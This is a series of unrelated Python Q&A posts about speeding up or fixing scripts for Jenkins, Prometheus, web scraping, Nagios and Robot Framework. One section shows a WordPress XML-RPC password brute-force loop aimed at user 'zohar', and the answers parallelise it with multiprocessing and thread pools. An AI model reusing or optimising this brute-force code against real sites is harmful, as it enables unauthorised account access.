I am trying to fetch the status of all the builds for all my jobs. I have written a script, but it takes way too much time to execute. Is there any way I can optimize the script? Any help will be appreciated.
import jenkins

def jenkinsconn():
    server = jenkins.Jenkins('server', username=username, password=password)
    jobs = server.get_jobs()
    job_name_list = []
    build_number_list = []
    build_info_list = []
    status_list_dict = {}
    success = 0
    failure = 0
    unstable = 0
    aborted = 0
    #print dir(server)
    for i in range(len(jobs)):
        job_name = jobs[i]['name']
        job_name_list.append(job_name)
    for i in range(len(job_name_list)):
        job_info = server.get_job_info(job_name_list[i])
        lastbuilt = job_info['lastSuccessfulBuild']
        if lastbuilt:
            b_number = job_info['lastSuccessfulBuild']['number']
            build_number_list.append(b_number)
    build_zipped = zip(job_name_list, build_number_list)
    for i, j in build_zipped:
        success = 0
        failure = 0
        unstable = 0
        aborted = 0
        for k in range(j):
            build_info = server.get_build_info(i, k + 1)
            build_info_list.append(build_info)
            status = build_info['result']
            if status == "SUCCESS":
                success += 1
            elif status == "FAILURE":
                failure += 1
            elif status == "UNSTABLE":
                unstable += 1
            else:
                aborted += 1
        statuscount = [success, failure, unstable, aborted]
        status_list_dict[i] = statuscount
If you only need the number of builds succeeding, failing, etc., then you can make do with one request per job, rather than one request per build as your code currently does. I can't find a method in the python-jenkins module to do this, but you can do it yourself against the Jenkins JSON API. For example:
try:  # Python 3
    from urllib.request import urlopen
    from urllib.parse import quote
except ImportError:  # Python 2
    from urllib2 import urlopen, quote
import json
import contextlib

status_list_dict = {}

with contextlib.closing(
        urlopen("http://HOST_NAME:8080/api/json")
) as job_list_response:
    job_list = json.load(job_list_response)["jobs"]

for job in job_list:
    status_counts = [0, 0, 0, 0]
    with contextlib.closing(
            urlopen(
                "http://HOST_NAME:8080/job/{job_name}/api/json?tree=allBuilds[result]".format(
                    job_name=quote(job["name"])
                )
            )
    ) as build_list_response:
        build_list = json.load(build_list_response)["allBuilds"]
    for build_data in build_list:
        if build_data["result"] == "SUCCESS":
            status_counts[0] += 1
        elif build_data["result"] == "FAILURE":
            status_counts[1] += 1
        elif build_data["result"] == "UNSTABLE":
            status_counts[2] += 1
        elif build_data["result"] == "ABORTED":
            status_counts[3] += 1
    status_list_dict[job["name"]] = status_counts
I have written an exporter in Python that converts JSON into Prometheus metrics. It works with a small amount of data, but when I test it with very many data points spaced milliseconds apart, it stops working.
JSON (extract):
{
  "Acquisition": {
    "refTriggerName": "NO_REF_TRIGGER",
    "refTriggerStamp": 1666592215243657724,
    "channelTimeSinceRefTrigger": [0e+00, 2.5e-04, ...],
    "channelValues": {
      "values": [4.861855e+00, 4.8581786e+00, ...]
    }
  }
}
json_exporter.py:
from prometheus_client import start_http_server, Metric, REGISTRY
import json
import requests
import sys
import time

class JsonCollector(object):
    def __init__(self, endpoint):
        self._endpoint = endpoint

    def collect(self):
        # Fetch the JSON
        response = json.loads(requests.get(self._endpoint).content.decode('UTF-8'))

        metric = Metric('fair_acquisition_signal', 'single sinus signal example', 'gauge')
        valuesArray = response['Acquisition']['channelValues']['values']
        refTriggerStamp = response['Acquisition']['refTriggerStamp']
        timestampArray = response['Acquisition']['channelTimeSinceRefTrigger']

        counter = 0
        while (counter < len(valuesArray)) and (counter < len(timestampArray)):
            timestampV = refTriggerStamp / 1e9 + timestampArray[counter]
            metric.add_sample('fair_acquisition_signal', value=valuesArray[counter], timestamp=timestampV, labels={})
            #print(str(datetime.fromtimestamp(timestampV)) + ' ' + str(valuesArray[counter]))
            counter += 1
        #for sample in metric.samples:
        #    print(sample)
        #print(str(len(metric.samples)))
        yield metric

if __name__ == '__main__':
    # Usage: json_exporter.py port endpoint
    start_http_server(int(sys.argv[1]))
    REGISTRY.register(JsonCollector(sys.argv[2]))
    while True: time.sleep(1)
The data should actually form a sine wave, but in Prometheus it looks like this.
Visualization in Prometheus: [screenshot of the Prometheus graph]
Does anyone know where my error is?
Is there a way to speed up my code using the multiprocessing interface? I have a data array that contains passwords, and I would like to run several requests together.
import requests

data = ['test', 'test1', 'test2']
counter = 0
for x in data:
    counter += 1
    burp0_data = ("<methodCall>\r\n<methodName>wp.getUsersBlogs</methodName>\r\n<params>\r\n<param>"
                  "<value>zohar</value></param>\r\n<param><value>" + x + "</value>"
                  "</param>\r\n</params>\r\n</methodCall>\r\n")
    s = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    if "403" not in s.text:
        print(s.text)
        print(x)
        exit()
The Python multiprocessing module is what you are looking for. For instance, it has a parallel map function, which will run all requests asynchronously. Here is roughly what your code would look like:
import requests
from multiprocessing import Pool

def post(x):
    burp0_data = ("<methodCall>\r\n<methodName>wp.getUsersBlogs</methodName>\r\n<params>\r\n<param>"
                  "<value>zohar</value></param>\r\n<param><value>" + x + "</value>"
                  "</param>\r\n</params>\r\n</methodCall>\r\n")
    s = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
    if "403" not in s.text:
        return s.text, x
    return None, None

if __name__ == '__main__':
    data = ['test', 'test1', 'test2']
    with Pool(processes=len(data)) as pool:
        results = pool.map(post, data, 1)
        for res in results:
            if res[0] is not None:
                print(res[0])
                print(res[1])
                exit()
For more information please refer to the Python docs on multiprocessing.
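Since these requests are I/O-bound rather than CPU-bound, a thread pool is often enough and avoids the overhead of spawning processes. Below is a minimal, untested sketch of that variant; it assumes the post() function and the burp0_url / burp0_headers variables from the answer above are already defined.
import requests
from multiprocessing.dummy import Pool as ThreadPool  # thread-based Pool with the same API

if __name__ == '__main__':
    data = ['test', 'test1', 'test2']
    # One worker thread per password candidate; map() blocks until all requests finish.
    with ThreadPool(processes=len(data)) as pool:
        results = pool.map(post, data)
    for text, x in results:
        if text is not None:
            print(text)
            print(x)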
Hi all,
I'm trying to parse the metadata of 10,000 websites into a Pandas dataframe for an SEO / analytics application, but the code is taking ages. I've been trying it on 1,000 websites and the code has been running for the last 3 hours (it works without problems on 10-50 websites).
Here's the sample data:
index site
0 http://www.google.com
1 http://www.youtube.com
2 http://www.facebook.com
3 http://www.cnn.com
... ...
10000 http://www.sony.com
Here's my Python (2.7) code:
# Importing dependencies
import pandas as pd
import numpy as np
import requests
from bs4 import BeautifulSoup
import metadata_parser

# Loading the Pandas dataframe
df = pd.read_csv('final_urls')

# Utility functions
def meta(website, metadata):
    full_url = website
    parser = metadata_parser.MetadataParser(url=full_url)
    if metadata == 'all':
        return parser.metadata
    else:
        return parser.metadata[metadata]

def meta_all(website):
    try:
        result = meta(website, 'all')
    except BaseException:
        result = 'Exception'
    return result

# Main
df['site'].apply(meta_all)
I'd like the code to be much faster. I've been using the metadata_parser library (https://github.com/jvanasco/metadata_parser) which relies heavily on requests and BeautifulSoup.
I understand I might be able to switch the parser to lxml to make the code faster. lxml is already installed on my machine, so BeautifulSoup should already be picking it up as its first choice.
Do you have any suggestion to get this code to run faster?
Thanks!
You can use Python Twisted (Twisted is an event-driven networking engine written in Python). You will need to install a few packages with pip: probably twisted, pyopenssl and service_identity, and maybe others. This code works on Python 2.7, which you say you are using.
from twisted.internet import defer, reactor
from twisted.web.client import getPage
import metadata_parser
import pandas as pd
import numpy as np
from multiprocessing import Process

def pageCallback(result, url):
    data = {
        'content': result,
        'url': url,
    }
    return data

def getPageData(url):
    d = getPage(url)
    d.addCallback(pageCallback, url)
    return d

def listCallback(result):
    for isSuccess, data in result:
        if isSuccess:
            print("Call to %s succeeded " % (data['url']))
            parser = metadata_parser.MetadataParser(html=data['content'], search_head_only=False)
            print(parser.metadata)  # do something with it here

def finish(ign):
    reactor.stop()

def start(urls):
    data = []
    for url in urls:
        data.append(getPageData(url))
    dl = defer.DeferredList(data)
    dl.addCallback(listCallback)
    dl.addCallback(finish)

def processStart(chunk):
    start(chunk)
    reactor.run()

df = pd.read_csv('final_urls')
urls = df['site'].values.tolist()

chunkCounter = 0
chunkLength = 1000

for chunk in np.array_split(urls, len(urls) / chunkLength):
    p = Process(target=processStart, args=(chunk,))
    p.start()
    p.join()
    chunkCounter += 1
    print("Finished chunk %s of %s URLs" % (str(chunkCounter), str(chunkLength)))
I have run it on 10,000 URLs and it took less than 16 minutes.
Updated
Normally you would process the data you generate where I added the comment "# do something with it here". If you want the generated data returned for further processing, you can do something like this (I have also updated the code to use treq):
from twisted.internet import defer, reactor
import treq
import metadata_parser
import pandas as pd
import numpy as np
import multiprocessing
from twisted.python import log
import sys

# log.startLogging(sys.stdout)

results = []

def pageCallback(result, url):
    # result.content() returns a Deferred that fires with the response body;
    # returning that Deferred chains it, so downstream callbacks get the actual bytes.
    d = result.content()
    d.addCallback(lambda content: {'content': content, 'url': url})
    return d

def getPageData(url):
    d = treq.get(url, timeout=60, headers={'User-Agent': ["Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"]})
    d.addCallback(pageCallback, url)
    return d

def listCallback(result):
    global results
    for isSuccess, data in result:
        if isSuccess:
            print("Call to %s succeeded " % (data['url']))
            parser = metadata_parser.MetadataParser(html=str(data['content']), search_head_only=False)
            # print(parser.metadata)  # do something with it here
            results.append((data['url'], parser.metadata))

def finish(ign):
    reactor.stop()

def start(urls):
    data = []
    for url in urls:
        data.append(getPageData(url))
    dl = defer.DeferredList(data)
    dl.addCallback(listCallback)
    dl.addCallback(finish)

def processStart(chunk, returnList):
    start(chunk)
    reactor.run()
    returnList.extend(results)

df = pd.read_csv('final_urls')
urls = df['site'].values.tolist()

chunkCounter = 0
chunkLength = 1000

manager = multiprocessing.Manager()
returnList = manager.list()

for chunk in np.array_split(urls, len(urls) / chunkLength):
    p = multiprocessing.Process(target=processStart, args=(chunk, returnList))
    p.start()
    p.join()
    chunkCounter += 1
    print("Finished chunk %s of %s URLs" % (str(chunkCounter), str(chunkLength)))

for res in returnList:
    print(res)
print(len(returnList))
You may also want to add some error handling; to help with that, you can uncomment the line reading "log.startLogging(sys.stdout)", but that is too much detail for one answer. If some URLs fail, I would generally retry them by running the code again with just the failed URLs, possibly a few times if necessary.
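As a rough illustration of that retry idea (not part of the original answer), one could record failing URLs with an errback so a later run can be fed just those; the pageErrback helper and failed_urls list below are illustrative additions, not existing API.
failed_urls = []

def pageErrback(failure, url):
    # Remember which URL failed so a later pass can retry only these.
    print("Call to %s failed: %s" % (url, failure.getErrorMessage()))
    failed_urls.append(url)
    return None  # swallow the error; the DeferredList entry will then carry data=None

def getPageData(url):
    d = treq.get(url, timeout=60)
    d.addCallback(pageCallback, url)
    d.addErrback(pageErrback, url)
    return d
With this change, listCallback should skip entries whose data is None (for example, `if isSuccess and data:`), and failed_urls can then be written out and fed back into start() for another attempt.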
I am writing a small Python script that iterates through a large JSON output, grabs the information I need and puts it into small dictionaries. It then iterates through the dictionaries looking for a key called restartcount. If the count is more than 3 but less than 5, it prints a warning; if it is greater than 5, it prints critical. However, this script is meant to be a Nagios plugin, which requires exit codes: sys.exit(1) for warning and sys.exit(2) for critical. As my code shows, I use a function to grab the info I need into a small dictionary, then run a for loop. If I place a sys.exit() inside any of the if statements, only the first dictionary is checked and the rest are skipped. Any help would be appreciated on how to incorporate the exit codes without skipping or missing any information.
Code:
import urllib2
import json
import argparse
from sys import exit

def get_content(pod):
    kube = {}
    kube['name'] = pod["metadata"]["name"]
    kube['phase'] = pod["status"]["phase"]
    kube['restartcount'] = pod["status"]["containerStatuses"][0]["restartCount"]
    return kube

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Monitor Kubernetes Pods')
    parser.add_argument('-w', '--warning', type=int, help='levels we should look into', default=3)
    parser.add_argument('-c', '--critical', type=int, help='its gonna explode', default=5)
    parser.add_argument('-p', '--port', type=int, help='port to access api server', default=8080)
    args = parser.parse_args()

    try:
        api_call = "http://localhost:{}/api/v1/namespaces/default/pods/".format(args.port)
        req = urllib2.urlopen(api_call).read()
        content = json.loads(req)
    except urllib2.URLError:
        print 'URL Error. Please re-check the API call'
        exit(2)

    for pods in content.get("items"):
        try:
            block = get_content(pods)
            print block
        except KeyError:
            print 'Container Failed'
            exit(2)

        if block["restartcount"] >= args.warning and block["restartcount"] < args.critical:
            print "WARNING | {} restart count is {}".format(block["name"], block["restartcount"])
        if block["restartcount"] >= args.critical:
            print "CRITICAL | {} restart count is {}".format(block["name"], block["restartcount"])
What the block variable looks like:
{'phase': u'Running', 'restartcount': 0, 'name': u'pixels-1.0.9-k1v5u'}
Create a variable called something like exit_status. Initialize it to 0, and set it as needed in your code (e.g. where you are currently calling exit). At the end of program execution, call sys.exit(exit_status) (and nowhere else).
Rewriting the last section of your code:
exit_status = 0
for pods in content.get("items"):
    try:
        block = get_content(pods)
        print block
    except KeyError:
        print 'Container Failed'
        exit(2)

    if block["restartcount"] >= args.warning and block["restartcount"] < args.critical:
        print "WARNING | {} restart count is {}".format(block["name"], block["restartcount"])
        if exit_status < 1: exit_status = 1
    if block["restartcount"] >= args.critical:
        print "CRITICAL | {} restart count is {}".format(block["name"], block["restartcount"])
        exit_status = 2

sys.exit(exit_status)
The variable approach is correct. The problem is that, as you keep checking further pods, you could set the status to 1 when it was already 2, so I would suggest adding a condition not to set it to 1 if it is already 2.
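A minimal sketch of that guard (my wording, not the answer's), assuming exit_status starts at 0 and block and args come from the code above:
# Never downgrade the status: critical (2) wins over warning (1), which wins over OK (0).
if block["restartcount"] >= args.critical:
    exit_status = max(exit_status, 2)
elif block["restartcount"] >= args.warning:
    exit_status = max(exit_status, 1)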
I want to filter failure messages from the output files generated after executing my test cases in Robot Framework. I have tried modules like from robot.api import ExecutionResult, but that only gives me the count of passed and failed test cases.
I have also tried other Robot Framework libraries like import robot.errors to filter out all error messages, but didn't have any luck. Below is my code block:
#!/usr/bin/python
from robot.api import ExecutionResult
import robot.errors
from robot.result.visitor import ResultVisitor

xmlpath = "<output.xml PATH>"
result = ExecutionResult(xmlpath)
result.configure(stat_config={'suite_stat_level': 2,
                              'tag_stat_combine': 'tagANDanother'})
stats = result.statistics
print stats.total.critical.failed
print stats.total.critical.passed
print stats.total.critical.passed + stats.total.critical.failed

class FailureCollector(ResultVisitor):
    def __init__(self):
        self.failures = []

    def visit_test(self, test):
        if not test.passed:
            self.failures += [test]

failure_collector = FailureCollector()
result.visit(failure_collector)
print failure_collector.failures
# The above print gives me all failed test cases as a list,
# e.g. ['test1: My example Testcase1', 'test2: My example Testcase2']
Any example of how to get this done would be very helpful.
I tried a lot to get my expected output using the Robot Framework APIs but didn't find a proper solution. Finally I solved it with the xml.etree.ElementTree module: I parse the robot output.xml file directly and extract what I need.
import xml.etree.ElementTree as ET
import re

tree = ET.parse('<output.xml file Path>')
root = tree.getroot()
testplans = <Testplans as a list>

i = 0
err_dict = {}
for testplan in testplans:
    full_err_list = []
    err_list = []
    for suite_level_1 in root:
        try:
            if suite_level_1.tag == "suite":
                for suite_level_2 in suite_level_1:
                    if suite_level_2.tag == "suite" and suite_level_2.attrib['name'] == testplan:
                        for suite_level_3 in suite_level_2:
                            if suite_level_3.tag == "suite":
                                for test in suite_level_3:
                                    if test.tag == "test":
                                        for kw_level_5 in test:
                                            if kw_level_5.tag == "kw" and kw_level_5.attrib['name'] == '<specific keyword under which you expect your result (error or success message)>':
                                                for msg in kw_level_5:
                                                    if msg.tag == 'msg':
                                                        err_str = msg.text
                                                        #print err_str
                                                        mat = re.match(r'\$\{FinalResult\}\s=\s(.*)', err_str)
                                                        if mat and mat.group(1) != 'Succeeded.':
                                                            i = i + 1
                                                            #print mat.group(1), i
                                                            err = mat.group(1)
                                                            full_err_list.append(err)
                                                            if err not in err_list:
                                                                err_list.append(err)
        except:
            print "Errors found"
            break
    err_dict[testplan] = err_list
    print "\n########## " + testplan + " ##########\n"
    print "Total no of failures", len(full_err_list)
    for err_name in err_list:
        print err_name, "===>>", full_err_list.count(err_name)
# The above will print each error name and its count for a specific test plan
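For completeness, here is a hedged sketch of an alternative that stays within the Robot Framework result API, building on the visitor from the question. It assumes test.message holds the failure text of a failed test, which may not capture the keyword-level ${FinalResult} detail that the XML approach above extracts.
from robot.api import ExecutionResult
from robot.result.visitor import ResultVisitor

class FailureMessageCollector(ResultVisitor):
    def __init__(self):
        self.failures = {}  # maps test long name -> failure message

    def visit_test(self, test):
        if not test.passed:
            self.failures[test.longname] = test.message

result = ExecutionResult("<output.xml file Path>")
collector = FailureMessageCollector()
result.visit(collector)
for name, message in collector.failures.items():
    print("%s ===>> %s" % (name, message))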